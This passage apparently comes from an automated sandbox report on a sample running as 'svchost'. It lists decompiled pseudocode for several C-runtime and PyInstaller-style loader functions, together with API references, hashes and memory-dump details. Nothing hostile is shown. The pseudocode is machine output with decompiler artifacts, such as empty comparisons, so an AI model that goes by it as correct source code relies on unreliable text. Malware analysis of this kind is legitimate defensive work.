				_t35 = _a4;
				_v4 = 0;
				E00BC9F16(__edx,  *_a4, 0, 0); // executed
				E00BC9B2B( &_a4, 1, 2,  *_a4); // executed
				_t15 = _a4;
				if(_t15 != 0x4d || _t15 != 0x5a) {
					L8:
					return _t15 | 0xffffffff;
				} else {
					E00BC9F16(__edx,  *_t35, 0x3c, 0); // executed
					E00BC9B2B( &_v4, 4, 1,  *_t35);
					E00BC9F16(__edx,  *_t35, _v4 + 0x18, 0); // executed
					E00BC9B2B( &_a4, 2, 1,  *_t35);
					_t15 = _a4;
					if(_t15 != 0xb) {
						goto L8;
					} else {
						if(_t15 != 1) {
							if(_t15 != 2) {
								goto L8;
							} else {
								_t32 = 0xa8;
								goto L7;
							}
						} else {
							_t32 = 0x98;
							L7:
							E00BC9F16(_t34,  *_t35, _v4 + _t32, 0);
							E00BC9B2B( &_v4, 4, 1,  *_t35);
							_t30 = _v4;
							_t31 =  ==  ? _t32 | 0xffffffff : _t30;
							return  ==  ? _t32 | 0xffffffff : _t30;
						}
					}
				}
			}







                            0x00bc1120
                            0x00bc1122
                            0x00bc112a
                            0x00bc1134
                            0x00bc1144
                            0x00bc1149
                            0x00bc1153
                            0x00bc11f2
                            0x00bc11f7
                            0x00bc1162
                            0x00bc1168
                            0x00bc1178
                            0x00bc1189
                            0x00bc1199
                            0x00bc119e
                            0x00bc11a8
                            0x00000000
                            0x00bc11aa
                            0x00bc11ad
                            0x00bc11b9
                            0x00000000
                            0x00bc11bb
                            0x00bc11bb
                            0x00000000
                            0x00bc11bb
                            0x00bc11af
                            0x00bc11af
                            0x00bc11c0
                            0x00bc11cb
                            0x00bc11db
                            0x00bc11e0
                            0x00bc11ec
                            0x00bc11f1
                            0x00bc11f1
                            0x00bc11ad
                            0x00bc11a8

                            APIs
                            Memory Dump Source
                            • Source File: 00000013.00000002.478877972.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 00000013.00000002.478868146.0000000000BC0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.478903755.0000000000BE0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.478915424.0000000000BEC000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.478923115.0000000000BEE000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.478930775.0000000000BF4000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.478940137.0000000000BF7000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: __fread_nolock
                            • String ID:
                            • API String ID: 2638373210-0
                            • Opcode ID: 0f18c8a29637b3e68dead0b09e1943be6a98e9a9608b54b83cbe93af802145a5
                            • Instruction ID: 6562a225a6d9a55a652f5c0f4fdcab9b1f01f768efeb802c34641febffc84a15
                            • Opcode Fuzzy Hash: 0f18c8a29637b3e68dead0b09e1943be6a98e9a9608b54b83cbe93af802145a5
                            • Instruction Fuzzy Hash: DE21DC71644301BAFA306E18CC87F9A73DAEF41724F14095DF3D0BA1D6DAAADC428B06
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00BCCDB3, Relevance: 6.1, APIs: 4, Instructions: 65timeCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 745 bccdb3-bccdc9 746 bccdd9-bccde9 FileTimeToSystemTime 745->746 747 bccdcb-bccdcf 745->747 749 bcce3d-bcce49 GetLastError call bcc998 746->749 750 bccdeb-bccdfd SystemTimeToTzSpecificLocalTime 746->750 747->746 748 bccdd1-bccdd7 747->748 752 bcce4f-bcce5c call bc786a 748->752 757 bcce4a-bcce4d 749->757 750->749 753 bccdff-bcce1f call bcce5d 750->753 759 bcce24-bcce2e 753->759 757->752 759->752 760 bcce30-bcce3b call bcc9ce 759->760 760->757
                            C-Code - Quality: 100%
                            			E00BCCDB3(struct _FILETIME _a4, intOrPtr _a8, signed int _a12, void* _a16) {
				signed int _v8;
				struct _SYSTEMTIME _v24;
				struct _SYSTEMTIME _v40;
				signed int _v44;
				signed int _t20;
				signed int _t26;
				signed int _t27;
				int _t30;
				signed int _t43;
				signed int _t46;

				_t20 =  *0xbec008; // 0x2eb5fe5e
				_v8 = _t20 ^ _t46;
				if(_a4.dwLowDateTime != 0 || _a8 != 0) {
					if(FileTimeToSystemTime( &_a4,  &_v40) == 0) {
						L7:
						_t26 = E00BCC998(GetLastError());
						goto L8;
					} else {
						_t30 = SystemTimeToTzSpecificLocalTime(0,  &_v40,  &_v24); // executed
						if(_t30 == 0) {
							goto L7;
						} else {
							_v44 = _v44 | 0xffffffff;
							_t27 = E00BCCE5D( &_v24,  &(_v24.wMonth),  &(_v24.wDay),  &(_v24.wHour),  &(_v24.wMinute),  &(_v24.wSecond),  &_v44); // executed
							if((_t27 & _t43) == 0xffffffff) {
								_t26 = E00BCC9CE();
								 *_t26 = 0x84;
								L8:
								_t27 = _t26 | 0xffffffff;
							}
						}
					}
				} else {
					_t27 = _a12;
				}
				E00BC786A();
				return _t27;
			}













                            0x00bccdbb
                            0x00bccdc2
                            0x00bccdc9
                            0x00bccde9
                            0x00bcce3d
                            0x00bcce44
                            0x00000000
                            0x00bccdeb
                            0x00bccdf5
                            0x00bccdfd
                            0x00000000
                            0x00bccdff
                            0x00bccdff
                            0x00bcce1f
                            0x00bcce2e
                            0x00bcce30
                            0x00bcce35
                            0x00bcce4a
                            0x00bcce4a
                            0x00bcce4d
                            0x00bcce2e
                            0x00bccdfd
                            0x00bccdd1
                            0x00bccdd1
                            0x00bccdd4
                            0x00bcce54
                            0x00bcce5c

                            APIs
                            • FileTimeToSystemTime.KERNEL32(00000000,?,?,?,00000000,00000000,000000FF,?,?,00000000), ref: 00BCCDE1
                            • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00BCCDF5
                            • GetLastError.KERNEL32 ref: 00BCCE3D
                            • __dosmaperr.LIBCMT ref: 00BCCE44
                            Memory Dump Source
                            • Source File: 00000013.00000002.478877972.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 00000013.00000002.478868146.0000000000BC0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.478903755.0000000000BE0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.478915424.0000000000BEC000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.478923115.0000000000BEE000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.478930775.0000000000BF4000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.478940137.0000000000BF7000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: Time$System$ErrorFileLastLocalSpecific__dosmaperr
                            • String ID:
                            • API String ID: 593088924-0
                            • Opcode ID: f54be86c729cadeda82c0f5de60323b3e2fea15e0f44ca57e7542794b1418b2a
                            • Instruction ID: 4a551bcde6aa1bf4fc9a2c113122b7f96ba56e21cc61711b6179efebfa9cc4a0
                            • Opcode Fuzzy Hash: f54be86c729cadeda82c0f5de60323b3e2fea15e0f44ca57e7542794b1418b2a
                            • Instruction Fuzzy Hash: 59212E7290010DABCB01DFE4C985FDE7BFCEB19320F1046AAE51AD7180EB74EA449B61
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00BC2450, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 207COMMON
                            Download Yara Rule
                            C-Code - Quality: 40%
                            			E00BC2450(void* __edx, void* __eflags, char _a4092, char _a4096, char _a8192, signed int _a12284, signed int _a12288, intOrPtr _a12292, intOrPtr _a12296, intOrPtr _a12300) {
				char _v0;
				char _v4;
				void* __ebx;
				void* __edi;
				void* __ebp;
				signed int _t35;
				signed int _t39;
				signed int _t49;
				signed int _t52;
				signed int _t53;
				signed int _t60;
				signed int _t63;
				signed int _t64;
				signed int _t68;
				signed int _t69;
				signed int _t71;
				signed int _t74;
				void* _t76;
				signed int _t77;
				void* _t79;
				signed int _t85;
				signed int _t87;
				signed int _t91;
				signed int _t93;
				intOrPtr _t98;
				signed int _t101;
				intOrPtr* _t102;
				intOrPtr _t104;
				signed int _t108;
				void* _t110;
				void* _t112;
				void* _t114;
				signed int _t115;
				void* _t117;
				void* _t120;

				_t120 = __eflags;
				_t90 = __edx;
				E00BC7880();
				_t35 =  *0xbec008; // 0x2eb5fe5e
				_a12288 = _t35 ^ _t108;
				_t104 = _a12300;
				E00BCD2BE(E00BCA7EB(2), 0);
				_push(0);
				_t39 = E00BC1770(_t120);
				_t93 = _t39;
				_t110 = _t108 + 0x10;
				if(_t93 != 0) {
					_t39 = E00BC27A0(__edx,  &_v0, _v0);
					_t110 = _t110 + 8;
					__eflags = _t39;
					if(_t39 == 0) {
						goto L1;
					} else {
						_t39 = E00BC26F0( &_a8192,  &_v0);
						_t110 = _t110 + 8;
						__eflags = _t39;
						if(__eflags == 0) {
							goto L1;
						} else {
							_t39 = L00BC2930(__eflags,  &_a4096,  &_v0);
							_t110 = _t110 + 8;
							__eflags = _t39;
							if(_t39 == 0) {
								goto L1;
							} else {
								_push(_t76);
								_push("_MEIPASS2");
								_t77 = E00BC3E40(_t76, _t93);
								E00BC43D0("_MEIPASS2");
								_t49 = E00BC1690(_t104, _t93,  &_v0);
								_t112 = _t110 + 0x10;
								__eflags = _t49;
								if(_t49 != 0) {
									L8:
									 *((intOrPtr*)(_t93 + 0x4074)) = _t104;
									_t98 = _a12296;
									 *((intOrPtr*)(_t93 + 0x4070)) = _t98;
									__eflags = _t77;
									if(_t77 != 0) {
										L11:
										__imp__SetDllDirectoryW(E00BC4BF0(0, _t77, 0));
										L00BC9803(_t50);
										_t114 = _t112 + 0x10;
										__eflags = _t77;
										if(_t77 == 0) {
											_t98 = _a12292;
											goto L25;
										} else {
											_t85 = _t77;
											_t63 =  &_a4092;
											while(1) {
												_t91 =  *_t63;
												__eflags = _t91 -  *_t85;
												if(_t91 !=  *_t85) {
													break;
												}
												__eflags = _t91;
												if(_t91 == 0) {
													L17:
													_t64 = 0;
												} else {
													_t91 =  *((intOrPtr*)(_t63 + 1));
													__eflags = _t91 -  *((intOrPtr*)(_t85 + 1));
													if(_t91 !=  *((intOrPtr*)(_t85 + 1))) {
														break;
													} else {
														_t63 = _t63 + 2;
														_t85 = _t85 + 2;
														__eflags = _t91;
														if(_t91 != 0) {
															continue;
														} else {
															goto L17;
														}
													}
												}
												L19:
												__eflags = _t64;
												if(__eflags == 0) {
													L23:
													_push(_t93);
													E00BC2140(_t91, __eflags);
													_t101 = E00BC2010(_t77, __eflags, _t93); // executed
													L00BC2130(_t93); // executed
													_t115 = _t114 + 0xc;
													goto L31;
												} else {
													_t21 = _t93 + 0x2068; // 0x2068
													_t102 = _t21;
													_t52 = E00BC1AC0(_t102, 0x1000, "%s", _t77);
													_t115 = _t114 + 0x10;
													__eflags = _t52 - 0x1000;
													if(_t52 >= 0x1000) {
														goto L27;
													} else {
														_t22 = _t93 + 0x3068; // 0x3068
														 *((intOrPtr*)(_t93 + 0x4068)) = 1;
														_t87 = _t22 - _t102;
														__eflags = _t87;
														do {
															_t68 =  *_t102;
															_t102 = _t102 + 1;
															 *((char*)(_t87 + _t102 - 1)) = _t68;
															__eflags = _t68;
														} while (__eflags != 0);
														goto L23;
													}
												}
												goto L32;
											}
											asm("sbb eax, eax");
											_t64 = _t63 | 0x00000001;
											__eflags = _t64;
											goto L19;
										}
									} else {
										_t69 = E00BC21D0(_t93);
										_t114 = _t112 + 4;
										__eflags = _t69;
										if(_t69 != 0) {
											L25:
											_t52 = E00BC2070(_t90, _t104, _t93);
											_t115 = _t114 + 4;
											__eflags = _t52;
											if(_t52 != 0) {
												L27:
												_t53 = _t52 | 0xffffffff;
											} else {
												__eflags =  *((char*)(_t93 + 0x2068));
												_t29 = _t93 + 0x2068; // 0x2068
												_t79 = _t29;
												_t55 =  !=  ? _t79 :  &_a4092;
												E00BC4390("_MEIPASS2",  !=  ? _t79 :  &_a4092);
												_push("_MEIPASS2");
												E00BC3E40(_t79, _t93);
												_push(_t93);
												_t52 = E00BC80A0();
												_t115 = _t115 + 0x10;
												__eflags = _t52 - 0xffffffff;
												if(__eflags != 0) {
													E00BC23D0(_t52);
													_push(_t104);
													_push(_t98);
													_push(_t93);
													_push( &_v4);
													_t60 = E00BC4400(_t90, _t104, __eflags);
													_t117 = _t115 + 0x10;
													_t101 = _t60;
													__eflags =  *((intOrPtr*)(_t93 + 0x4068)) - 1;
													if( *((intOrPtr*)(_t93 + 0x4068)) == 1) {
														_push(_t79);
														E00BC40E0(_t90);
														_t117 = _t117 + 4;
													}
													E00BC1730(_t90, _t104, _t93);
													_t115 = _t117 + 4;
													L31:
													_t53 = _t101;
												} else {
													goto L27;
												}
											}
										} else {
											_t77 =  &_a4096;
											goto L11;
										}
									}
									L32:
									__eflags = _a12284 ^ _t115;
									E00BC786A();
									return _t53;
								} else {
									_t71 = E00BC1690(_t104, _t93,  &_a8192);
									_t112 = _t112 + 8;
									__eflags = _t71;
									if(__eflags != 0) {
										goto L8;
									} else {
										_push( &_a8192);
										_t74 = E00BC1910(__eflags, "Cannot open self %s or archive %s\n",  &_v0);
										__eflags = _a12288 ^ _t112 + 0x0000000c;
										E00BC786A();
										return _t74 | 0xffffffff;
									}
								}
							}
						}
					}
				} else {
					L1:
					E00BC786A();
					return _t39 | 0xffffffff;
				}
			}






































                            0x00bc2450
                            0x00bc2450
                            0x00bc2455
                            0x00bc245a
                            0x00bc2461
                            0x00bc2469
                            0x00bc247e
                            0x00bc2483
                            0x00bc2485
                            0x00bc248a
                            0x00bc248c
                            0x00bc2491
                            0x00bc24b5
                            0x00bc24ba
                            0x00bc24bd
                            0x00bc24bf
                            0x00000000
                            0x00bc24c1
                            0x00bc24ce
                            0x00bc24d3
                            0x00bc24d6
                            0x00bc24d8
                            0x00000000
                            0x00bc24da
                            0x00bc24e7
                            0x00bc24ec
                            0x00bc24ef
                            0x00bc24f1
                            0x00000000
                            0x00bc24f3
                            0x00bc24f3
                            0x00bc24f4
                            0x00bc2503
                            0x00bc2505
                            0x00bc2510
                            0x00bc2515
                            0x00bc2518
                            0x00bc251a
                            0x00bc2566
                            0x00bc2566
                            0x00bc256d
                            0x00bc2574
                            0x00bc257a
                            0x00bc257c
                            0x00bc2596
                            0x00bc25a6
                            0x00bc25ad
                            0x00bc25b2
                            0x00bc25b5
                            0x00bc25b7
                            0x00bc264f
                            0x00000000
                            0x00bc25bd
                            0x00bc25bd
                            0x00bc25bf
                            0x00bc25c6
                            0x00bc25c6
                            0x00bc25c8
                            0x00bc25ca
                            0x00000000
                            0x00000000
                            0x00bc25cc
                            0x00bc25ce
                            0x00bc25e2
                            0x00bc25e2
                            0x00bc25d0
                            0x00bc25d0
                            0x00bc25d3
                            0x00bc25d6
                            0x00000000
                            0x00bc25d8
                            0x00bc25d8
                            0x00bc25db
                            0x00bc25de
                            0x00bc25e0
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00bc25e0
                            0x00bc25d6
                            0x00bc25eb
                            0x00bc25eb
                            0x00bc25ed
                            0x00bc2633
                            0x00bc2633
                            0x00bc2634
                            0x00bc2640
                            0x00bc2642
                            0x00bc2647
                            0x00000000
                            0x00bc25ef
                            0x00bc25f5
                            0x00bc25f5
                            0x00bc2601
                            0x00bc2606
                            0x00bc2609
                            0x00bc260e
                            0x00000000
                            0x00bc2614
                            0x00bc2614
                            0x00bc261a
                            0x00bc2624
                            0x00bc2624
                            0x00bc2626
                            0x00bc2626
                            0x00bc2628
                            0x00bc262b
                            0x00bc262f
                            0x00bc262f
                            0x00000000
                            0x00bc2626
                            0x00bc260e
                            0x00000000
                            0x00bc25ed
                            0x00bc25e6
                            0x00bc25e8
                            0x00bc25e8
                            0x00000000
                            0x00bc25e8
                            0x00bc257e
                            0x00bc257f
                            0x00bc2584
                            0x00bc2587
                            0x00bc2589
                            0x00bc2656
                            0x00bc2657
                            0x00bc265c
                            0x00bc265f
                            0x00bc2661
                            0x00bc269d
                            0x00bc269d
                            0x00bc2663
                            0x00bc2663
                            0x00bc266a
                            0x00bc266a
                            0x00bc2677
                            0x00bc2680
                            0x00bc2685
                            0x00bc268a
                            0x00bc268f
                            0x00bc2690
                            0x00bc2695
                            0x00bc2698
                            0x00bc269b
                            0x00bc26a2
                            0x00bc26a7
                            0x00bc26a8
                            0x00bc26ad
                            0x00bc26ae
                            0x00bc26af
                            0x00bc26b4
                            0x00bc26b7
                            0x00bc26b9
                            0x00bc26c0
                            0x00bc26c2
                            0x00bc26c3
                            0x00bc26c8
                            0x00bc26c8
                            0x00bc26cc
                            0x00bc26d1
                            0x00bc26d4
                            0x00bc26d4
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00bc269b
                            0x00bc258f
                            0x00bc258f
                            0x00000000
                            0x00bc258f
                            0x00bc2589
                            0x00bc26d6
                            0x00bc26e1
                            0x00bc26e3
                            0x00bc26ee
                            0x00bc251c
                            0x00bc2525
                            0x00bc252a
                            0x00bc252d
                            0x00bc252f
                            0x00000000
                            0x00bc2531
                            0x00bc2538
                            0x00bc2543
                            0x00bc2558
                            0x00bc255a
                            0x00bc2565
                            0x00bc2565
                            0x00bc252f
                            0x00bc251a
                            0x00bc24f1
                            0x00bc24d8
                            0x00bc2493
                            0x00bc2493
                            0x00bc24a1
                            0x00bc24ac
                            0x00bc24ac

                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.478877972.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 00000013.00000002.478868146.0000000000BC0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.478903755.0000000000BE0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.478915424.0000000000BEC000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.478923115.0000000000BEE000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.478930775.0000000000BF4000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.478940137.0000000000BF7000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID:
                            • String ID: Cannot open self %s or archive %s$_MEIPASS2
                            • API String ID: 0-930416966
                            • Opcode ID: 84cb77bd3fadd8d78b786077c12cfcd888888e75027307bd4e48ab1035feb9ed
                            • Instruction ID: 0c881da09ee5a96b7feed6cb3ca558170ab86a5f16dff91839f3f00dd3a5e326
                            • Opcode Fuzzy Hash: 84cb77bd3fadd8d78b786077c12cfcd888888e75027307bd4e48ab1035feb9ed
                            • Instruction Fuzzy Hash: 99515C729042406BE621BB709C92FAB73DCEF91354F0405BDF95882283FB25DA18C6B3
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00BDB2EE, Relevance: 4.6, APIs: 3, Instructions: 80COMMON
                            Download Yara Rule
                            C-Code - Quality: 74%
                            			E00BDB2EE(void* __edx, void* __eflags) {
				signed int _v8;
				char _v264;
				char _v268;
				char _v272;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t10;
				void* _t14;
				void* _t17;
				signed int _t21;
				void* _t27;
				signed int _t36;
				void* _t38;
				signed int _t42;
				signed int _t44;
				signed int _t45;

				_t10 =  *0xbec008; // 0x2eb5fe5e
				_v8 = _t10 ^ _t45;
				 *0xbec91c =  *0xbec91c | 0xffffffff;
				 *0xbec910 =  *0xbec910 | 0xffffffff;
				_push(_t38);
				_t25 = "TZ";
				_t36 = 0;
				 *0xbf6578 = 0;
				_t14 = E00BD6CC0("TZ", __edx, 0, _t38, __eflags,  &_v268,  &_v264, 0x100, "TZ");
				if(_t14 != 0) {
					__eflags = _t14 - 0x22;
					if(__eflags == 0) {
						_t44 = E00BD0A25(_t27, _v268);
						__eflags = _t44;
						if(__eflags != 0) {
							_t21 = E00BD6CC0(_t25, __edx, 0, _t44, __eflags,  &_v272, _t44, _v268, _t25);
							__eflags = _t21;
							if(_t21 == 0) {
								E00BD09EB(0);
								_t36 = _t44;
							} else {
								_push(_t44);
								goto L5;
							}
						} else {
							_push(0);
							L5:
							E00BD09EB();
						}
					}
				} else {
					_t36 =  &_v264;
				}
				asm("sbb esi, esi");
				_t42 =  ~(_t36 -  &_v264) & _t36;
				if(_t36 == 0) {
					L13:
					E00BDB193(__eflags); // executed
				} else {
					_t52 =  *_t36;
					if( *_t36 == 0) {
						goto L13;
					} else {
						_push(_t36);
						E00BDAFBE(_t52);
					}
				}
				_t17 = E00BD09EB(_t42);
				E00BC786A();
				return _t17;
			}





















                            0x00bdb2f9
                            0x00bdb300
                            0x00bdb303
                            0x00bdb310
                            0x00bdb318
                            0x00bdb31a
                            0x00bdb31f
                            0x00bdb32e
                            0x00bdb335
                            0x00bdb33f
                            0x00bdb349
                            0x00bdb34c
                            0x00bdb359
                            0x00bdb35c
                            0x00bdb35e
                            0x00bdb377
                            0x00bdb37f
                            0x00bdb381
                            0x00bdb387
                            0x00bdb38c
                            0x00bdb383
                            0x00bdb383
                            0x00000000
                            0x00bdb383
                            0x00bdb360
                            0x00bdb360
                            0x00bdb361
                            0x00bdb361
                            0x00bdb361
                            0x00bdb38e
                            0x00bdb341
                            0x00bdb341
                            0x00bdb341
                            0x00bdb39b
                            0x00bdb39d
                            0x00bdb3a1
                            0x00bdb3b1
                            0x00bdb3b1
                            0x00bdb3a3
                            0x00bdb3a3
                            0x00bdb3a6
                            0x00000000
                            0x00bdb3a8
                            0x00bdb3a8
                            0x00bdb3a9
                            0x00bdb3ae
                            0x00bdb3a6
                            0x00bdb3b7
                            0x00bdb3c5
                            0x00bdb3cd

                            APIs
                            • _free.LIBCMT ref: 00BDB361
                            • _free.LIBCMT ref: 00BDB3B7
                              • Part of subcall function 00BDB193: _free.LIBCMT ref: 00BDB1EB
                              • Part of subcall function 00BDB193: GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00BE9410), ref: 00BDB1FD
                              • Part of subcall function 00BDB193: WideCharToMultiByte.KERNEL32(00000000,00000000,Pacific Standard Time,000000FF,00000000,0000003F,00000000,?,?), ref: 00BDB275
                              • Part of subcall function 00BDB193: WideCharToMultiByte.KERNEL32(00000000,00000000,Pacific Daylight Time,000000FF,?,0000003F,00000000,?), ref: 00BDB2A2
                            Memory Dump Source
                            • Source File: 00000013.00000002.478877972.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 00000013.00000002.478868146.0000000000BC0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.478903755.0000000000BE0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.478915424.0000000000BEC000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.478923115.0000000000BEE000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.478930775.0000000000BF4000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.478940137.0000000000BF7000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: _free$ByteCharMultiWide$InformationTimeZone
                            • String ID:
                            • API String ID: 314583886-0
                            • Opcode ID: 6186146ad07172cd16297303837b4b7bbf2c5d3edad3ac5e4bd1f3237c515ef2
                            • Instruction ID: f73aa9235887102a54a9830897f76a1018698745e2d2808f339524419713c613
                            • Opcode Fuzzy Hash: 6186146ad07172cd16297303837b4b7bbf2c5d3edad3ac5e4bd1f3237c515ef2
                            • Instruction Fuzzy Hash: 89212976800218D6DB35A6259C82EEAF7F8DB51370F1202D7E894A3381FF704E85D695
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00BD18F4, Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E00BD18F4(void* __eflags, signed int _a4) {
				intOrPtr _t13;
				int _t15;
				void* _t21;
				signed int _t33;
				long _t35;

				_t33 = _a4;
				if(E00BCE926(_t33) != 0xffffffff) {
					_t13 =  *0xbf6108; // 0x100a8e8
					if(_t33 != 1 || ( *(_t13 + 0x88) & 0x00000001) == 0) {
						if(_t33 != 2 || ( *(_t13 + 0x58) & 0x00000001) == 0) {
							goto L7;
						} else {
							goto L6;
						}
					} else {
						L6:
						_t21 = E00BCE926(2);
						if(E00BCE926(1) == _t21) {
							goto L1;
						}
						L7:
						_t15 = FindCloseChangeNotification(E00BCE926(_t33)); // executed
						if(_t15 != 0) {
							goto L1;
						}
						_t35 = GetLastError();
						L9:
						E00BCE895(_t33);
						 *((char*)( *((intOrPtr*)(0xbf6108 + (_t33 >> 6) * 4)) + 0x28 + (_t33 & 0x0000003f) * 0x30)) = 0;
						if(_t35 == 0) {
							return 0;
						}
						return E00BCC998(_t35) | 0xffffffff;
					}
				}
				L1:
				_t35 = 0;
				goto L9;
			}








                            0x00bd18fb
                            0x00bd1908
                            0x00bd190e
                            0x00bd1916
                            0x00bd1924
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00bd192c
                            0x00bd192c
                            0x00bd192e
                            0x00bd1940
                            0x00000000
                            0x00000000
                            0x00bd1942
                            0x00bd194a
                            0x00bd1952
                            0x00000000
                            0x00000000
                            0x00bd195a
                            0x00bd195c
                            0x00bd195d
                            0x00bd1975
                            0x00bd197c
                            0x00000000
                            0x00bd198a
                            0x00000000
                            0x00bd1985
                            0x00bd1916
                            0x00bd190a
                            0x00bd190a
                            0x00000000

                            APIs
                            • FindCloseChangeNotification.KERNEL32(00000000,00000000,?,?,00BD1812,?), ref: 00BD194A
                            • GetLastError.KERNEL32(?,00BD1812,?), ref: 00BD1954
                            • __dosmaperr.LIBCMT ref: 00BD197F
                            Memory Dump Source
                            • Source File: 00000013.00000002.478877972.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 00000013.00000002.478868146.0000000000BC0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.478903755.0000000000BE0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.478915424.0000000000BEC000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.478923115.0000000000BEE000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.478930775.0000000000BF4000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.478940137.0000000000BF7000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: ChangeCloseErrorFindLastNotification__dosmaperr
                            • String ID:
                            • API String ID: 490808831-0
                            • Opcode ID: 5a1a84e88ebd24ffd9d85538f602de16fd2cf5c76908a7882cb156b8d7f42b8c
                            • Instruction ID: bcb90055afd35b8a1550d97581d9db2b4f95aab8b160c37cc0d63313617daa17
                            • Opcode Fuzzy Hash: 5a1a84e88ebd24ffd9d85538f602de16fd2cf5c76908a7882cb156b8d7f42b8c
                            • Instruction Fuzzy Hash: F2010832A0421476DA75237CA875B7DA7C9CB81775F2505DEE8299B3C3EEB8DC838190
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00BD276E, Relevance: 4.6, APIs: 3, Instructions: 50COMMONLIBRARYCODE
                            Download Yara Rule
                            C-Code - Quality: 86%
                            			E00BD276E(void* __ecx, void* __eflags, signed int _a4, union _LARGE_INTEGER _a8, union _LARGE_INTEGER* _a12, intOrPtr _a16) {
				signed int _v8;
				void* _v12;
				void* _t15;
				int _t16;
				signed int _t19;
				signed int _t32;
				signed int _t33;
				signed int _t36;

				_t36 = _a4;
				_push(_t32);
				_t15 = E00BCE926(_t36);
				_t33 = _t32 | 0xffffffff;
				if(_t15 != _t33) {
					_push(_a16);
					_t16 = SetFilePointerEx(_t15, _a8, _a12,  &_v12); // executed
					if(_t16 != 0) {
						if((_v12 & _v8) == _t33) {
							goto L2;
						} else {
							_t19 = _v12;
							_t39 = (_t36 & 0x0000003f) * 0x30;
							 *( *((intOrPtr*)(0xbf6108 + (_t36 >> 6) * 4)) + _t39 + 0x28) =  *( *((intOrPtr*)(0xbf6108 + (_t36 >> 6) * 4)) + 0x28 + (_t36 & 0x0000003f) * 0x30) & 0x000000fd;
						}
					} else {
						E00BCC998(GetLastError());
						goto L2;
					}
				} else {
					 *((intOrPtr*)(E00BCC9CE())) = 9;
					L2:
					_t19 = _t33;
				}
				return _t19;
			}











                            0x00bd2776
                            0x00bd2779
                            0x00bd277b
                            0x00bd2780
                            0x00bd2786
                            0x00bd2799
                            0x00bd27a7
                            0x00bd27af
                            0x00bd27ca
                            0x00000000
                            0x00bd27cc
                            0x00bd27cc
                            0x00bd27d7
                            0x00bd27e1
                            0x00bd27e1
                            0x00bd27b1
                            0x00bd27b8
                            0x00000000
                            0x00bd27bd
                            0x00bd2788
                            0x00bd278d
                            0x00bd2793
                            0x00bd2793
                            0x00bd2795
                            0x00bd27eb

                            APIs
                            • SetFilePointerEx.KERNEL32(00000000,00000000,00000002,?,00000000,?,00000000,?,?,?,00BD281D,?,00000000,00000002,00000000), ref: 00BD27A7
                            • GetLastError.KERNEL32(?,00BD281D,?,00000000,00000002,00000000,?,00BD3143,00000000,00000000,00000000,00000002,00000000,?,00000000), ref: 00BD27B1
                            • __dosmaperr.LIBCMT ref: 00BD27B8
                            Memory Dump Source
                            • Source File: 00000013.00000002.478877972.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
